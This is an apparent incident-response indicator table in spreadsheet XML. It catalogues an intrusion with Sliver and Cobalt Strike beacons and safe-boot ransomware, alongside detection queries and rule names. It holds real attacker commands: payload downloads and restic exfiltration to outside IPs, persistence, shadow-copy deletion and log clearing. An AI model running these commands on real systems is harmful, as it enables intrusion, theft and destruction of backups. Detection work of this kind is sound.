    <s v="DeviceNetworkEvents_x000a_| where InitiatingProcessCommandLine has_all(&quot;copy&quot;, &quot;--max-age&quot;, &quot;--ignore-existing&quot;, &quot;--multi-thread-streams&quot;, &quot;--transfers&quot;) and InitiatingProcessCommandLine has_any(&quot;ftp&quot;, &quot;ssh&quot;, &quot;-q&quot;)"/>
    <s v="Suspected data exfiltration"/>
    <x v="5"/>
  </r>
  <r>
    <x v="116"/>
    <m/>
    <x v="1"/>
    <s v="Impacket"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="117"/>
    <s v="psexec-pid"/>
    <x v="1"/>
    <s v="psexec"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="118"/>
    <m/>
    <x v="1"/>
    <s v="ADRecon"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="119"/>
    <s v="gmer-pid"/>
    <x v="1"/>
    <s v="Gmer"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="120"/>
    <m/>
    <x v="1"/>
    <s v="Evilginx2"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="121"/>
    <m/>
    <x v="2"/>
    <s v="Brute Ratel"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="122"/>
    <m/>
    <x v="2"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="123"/>
    <m/>
    <x v="1"/>
    <s v="Mega"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="124"/>
    <s v="anydesk-pid"/>
    <x v="1"/>
    <s v="AnyDesk"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="125"/>
    <m/>
    <x v="1"/>
    <s v="Plink"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="126"/>
    <m/>
    <x v="1"/>
    <s v="Ngrok"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="127"/>
    <m/>
    <x v="1"/>
    <s v="SplashTop"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="128"/>
    <m/>
    <x v="1"/>
    <s v="Advanced IP Scanner"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="129"/>
    <m/>
    <x v="1"/>
    <s v="Sliver"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="130"/>
    <m/>
    <x v="4"/>
    <s v="c:\users\&lt;&gt;\Downloads\Version\setup.exe"/>
    <s v="Nitrogen Malware"/>
    <x v="7"/>
  </r>
  <r>
    <x v="131"/>
    <m/>
    <x v="4"/>
    <s v="c:\users\&lt;&gt;\Downloads\Version\python311.dll"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="132"/>
    <m/>
    <x v="4"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\python.exe"/>
    <s v="legit python"/>
    <x v="7"/>
  </r>
  <r>
    <x v="133"/>
    <m/>
    <x v="4"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\Cryptodrome"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="134"/>
    <m/>
    <x v="4"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\slv.py"/>
    <s v="sliver beacon"/>
    <x v="7"/>
  </r>
  <r>
    <x v="135"/>
    <m/>
    <x v="4"/>
    <s v="c:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="136"/>
    <m/>
    <x v="4"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\pythonw.exe worksliv.py"/>
    <s v="sliver beacon"/>
    <x v="7"/>
  </r>
  <r>
    <x v="137"/>
    <m/>
    <x v="8"/>
    <s v="slv.py &gt; worksliv.py"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="138"/>
    <m/>
    <x v="4"/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\pythonw.exe wo14.py"/>
    <s v="cobalt strike"/>
    <x v="7"/>
  </r>
  <r>
    <x v="139"/>
    <m/>
    <x v="4"/>
    <s v="C:\Windows\System32\cmd.exe"/>
    <s v="cobalt strike injection"/>
    <x v="7"/>
  </r>
  <r>
    <x v="140"/>
    <m/>
    <x v="4"/>
    <s v="C:\Windows\System32\winlogon.exe"/>
    <s v="cobalt strike injection"/>
    <x v="7"/>
  </r>
  <r>
    <x v="141"/>
    <m/>
    <x v="4"/>
    <s v="C:\Windows\System32\gpupdate.exe"/>
    <s v="cobalt strike injection"/>
    <x v="7"/>
  </r>
  <r>
    <x v="142"/>
    <m/>
    <x v="0"/>
    <s v="StartW_x000a_VoidFunc_x000a_DLLUnregisterServer_x000a_DllRegisterServer_x000a_DllInstall"/>
    <s v="Sliver DLL Exports"/>
    <x v="7"/>
  </r>
  <r>
    <x v="143"/>
    <m/>
    <x v="0"/>
    <s v="sliver strings found in memory"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="144"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="145"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /SC ONSTART /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="146"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="147"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="148"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /SC ONSTART /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="149"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="150"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /sc MINUTE /mo 720 /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="151"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="152"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /sc MINUTE /mo 720 /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="153"/>
    <m/>
    <x v="3"/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="154"/>
    <m/>
    <x v="3"/>
    <s v="schtasks /create /I 1 /TR C:\Users\REDACTED\AppData\Local\Notepad\UpdateEG.bat /TN UpdateEdge /SC ONIDLE"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="155"/>
    <m/>
    <x v="3"/>
    <s v="schtasks /create /I 1 /TR C:WindowsTempUpdate.exe /TN UpdateEdge /SC ONIDLE"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="156"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /C reg add &quot;HKLM\software\microsoft\windows nt\currentversion\winlogon&quot; /v UserInit /t reg_sz /d &quot;c:\windows\system32\userinit.exe,c:\users\[REDACTED]\appdata\local\notepad\UpdateEdge.bat"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="157"/>
    <m/>
    <x v="0"/>
    <s v="pythonw.exe renamed to setup.exe"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="158"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;proces_command_line&quot;: r''' c:\Windows\system32\cmd.exe /C rename pythonw.exe UpdateJson.exe''', &quot;initiating_process_command_line&quot;: &quot;winlogon.exe&quot;, &quot;initiating_process_name&quot;: &quot;winlogon.exe&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="159"/>
    <m/>
    <x v="3"/>
    <s v="bcdedit /set {default} safeboot network"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="160"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_access&quot;, &quot;source_process_path&quot;: &quot;c:\windows\system32\gpupdate.exe&quot;, &quot;target_process_path&quot;: &quot;c:\Windows\system32\lsass.exe&quot;, &quot;access&quot;: &quot;0x1fffff&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="161"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="162"/>
    <m/>
    <x v="3"/>
    <s v="ipconfig /all"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="163"/>
    <s v="nltest-pid"/>
    <x v="3"/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="164"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net localgroup administrators"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="165"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="166"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="cmd.exe /C net group &quot;Domain controllers&quot; /DOMAIN"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="167"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="cmd.exe /C net group &quot;domain admins&quot; /DOMAIN"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="168"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="cmd.exe /C net localgroup Administrators"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="169"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="cmd.exe /C net group /Domain"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="170"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="cmd.exe /C net group &quot;Domain Computers&quot; /DOMAIN"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="171"/>
    <s v="powerview-pid"/>
    <x v="3"/>
    <s v="PowerView"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="172"/>
    <s v="pshell-pid, powerview-pid"/>
    <x v="3"/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread 50"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="173"/>
    <m/>
    <x v="0"/>
    <s v="winlogon &gt; 3389 RDP"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="174"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="175"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="176"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c cd c:\windows\adfs\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="177"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c cd mkdir py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="178"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c cd  py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="179"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c curl -k https://91.92.245.26/python.zip -o c:\windows\adfs\py\python.zip 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="180"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' curl -k https://91.92.245.26/python.zip ''', &quot;initiating_process_command_line&quot;: &quot;cmd.exe /Q /c curl -k https://91.92.245.26/python.zip -o c:\windows\adfs\py\python.zip 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="181"/>
    <s v="pshell-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip -DestinationPath c:\windows\adfs\py\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="182"/>
    <s v="pshell-pid"/>
    <x v="9"/>
    <s v=" {&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip  -DestinationPath c:\windows\adfs\py\ ''', &quot;initiating_process_command_line&quot;: &quot; cmd.exe /Q /c powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip -DestinationPath c:\windows\adfs\py\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="183"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c  /cd dir 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="184"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c pythonw.exe wo12.py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <s v="impacket wmiexec.py"/>
    <x v="7"/>
  </r>
  <r>
    <x v="185"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r'''pythonw.exe wo12.py  ''', &quot;initiating_process_command_line&quot;: &quot;cmd.exe /Q /c pythonw.exe wo12.py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="186"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r'''c:\windows\system32\cmd.exe ''', &quot;initiating_process_command_line&quot;: &quot;pythonw.exe wo12.py&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="187"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;winevtx_4624&quot;, &quot;logon_type&quot;: &quot;9&quot;, &quot;logon_process&quot;: &quot;seclogo&quot;, &quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="188"/>
    <m/>
    <x v="0"/>
    <s v="cobalt strike config"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="189"/>
    <m/>
    <x v="0"/>
    <s v="&quot;HTTP/1.1 307 Temporary Redirect&quot; &amp;&amp; &quot;Content-Type: text/html; charset=utf-8&quot; &amp;&amp; &quot;Location: https://www.cloudflare.com/&quot; &amp;&amp; &quot;Content-Length: 63&quot; &amp;&amp; port=&quot;81&quot; &amp;&amp; protocol=&quot;http&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="190"/>
    <m/>
    <x v="3"/>
    <s v="restic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="191"/>
    <m/>
    <x v="3"/>
    <s v="restic.exe -r rest:http://195.123.226.84:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup &quot;F:\Shares\&lt;REDACTED&gt;\&lt;REDACTED&gt;&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="192"/>
    <m/>
    <x v="1"/>
    <s v="restic"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="193"/>
    <s v="psexec-pid"/>
    <x v="3"/>
    <s v="cmd.exe /C PsExec64.exe -accepteula \\&lt;DOMAIN-CONTROLLER-IP&gt; -c -f -d -s up.bat"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="194"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net  user REDACTED JapanNight!128 /domain"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="195"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /C for /f %a in (pc.txt) do copy /y \\&lt;REDACTED&gt;\c$\&lt;REDACTED&gt;.exe \\%a\c$\&lt;REDACTED&gt;.exe"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="196"/>
    <s v="psexec-pid"/>
    <x v="3"/>
    <s v="cmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="197"/>
    <m/>
    <x v="3"/>
    <s v="bcdedit  /set {default} safeboot network"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="198"/>
    <m/>
    <x v="3"/>
    <s v="findstr  /C:&quot;The operation completed successfully.&quot; "/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="199"/>
    <m/>
    <x v="3"/>
    <s v="reg  add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d &quot;cmd.exe /c C:\&lt;REDACTED-COMPANY-NAME&gt;.exe&quot; /f _x000a_findstr  /C:&quot;The operation completed successfully.&quot; "/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="200"/>
    <m/>
    <x v="3"/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultUserName /t REG_SZ /d &lt;REDACTED-DOMAIN-NAME&gt;\backup2 /f"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="201"/>
    <m/>
    <x v="3"/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultPassword /t REG_SZ /d JapanNight!128 /f"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="202"/>
    <m/>
    <x v="3"/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v AutoAdminLogon /t REG_SZ /d 1 /f"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="203"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="204"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /d Service&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="205"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;bcdedit /set {current} safeboot network&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="206"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network &quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="207"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \&quot;C:\example.exe\&quot;&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="208"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network &quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="209"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \&quot;C:\example.exe\&quot;&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="210"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network &quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="211"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \&quot;C:\example.exe\&quot;&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="212"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\15991160457623399845550968347370640942 /f&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="213"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /f&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="214"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;sc delete 15991160457623399845550968347370640942&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="215"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;bcdedit /deletevalue {current} safeboot&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="216"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wmic csproduct get UUID&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="217"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;iisreset.exe /stop&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="218"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="219"/>
    <s v="vss-pid"/>
    <x v="3"/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;vssadmin.exe Delete Shadows /all /quiet&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="220"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;arp -a&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="221"/>
    <s v="vss-pid"/>
    <x v="3"/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;wmic.exe Shadowcopy Delete&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="222"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wevtutil.exe el&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="223"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wevtutil.exe cl &lt;MULTIPLE EVENT LOGS&gt;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="224"/>
    <m/>
    <x v="10"/>
    <s v="934fa692-f2fa-4465-8bb3-ee1d4c0718cc : Enabling Safeboot with BCDEDIT_x000a_181f510b-0b3c-4e05-939c-7623a4a9c82c : Execution of Python Scripts in AppData Directory_x000a_6f77de5c-27af-435b-b530-e2d07b77a980 : Impacket Tool Execution_x000a_d2722770-3295-478e-bd58-c3c18baaa821 : Modification of UserInit Registry Value_x000a_3f684d2e-4760-4db9-a578-3698e21a01d5 : Modification of UserInit Registry Value_x000a_2249fc47-1825-4137-b9ce-aa65749bb68c : Restic Backup Tool Misuse"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="225"/>
    <s v="nltest-pid"/>
    <x v="11"/>
    <s v="5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="226"/>
    <m/>
    <x v="11"/>
    <s v="968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="227"/>
    <m/>
    <x v="11"/>
    <s v="8d5aca11-22b3-4f22-b7ba-90e60533e1fb : Wmiexec Default Output File"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="228"/>
    <m/>
    <x v="11"/>
    <s v="526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="229"/>
    <m/>
    <x v="11"/>
    <s v="7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
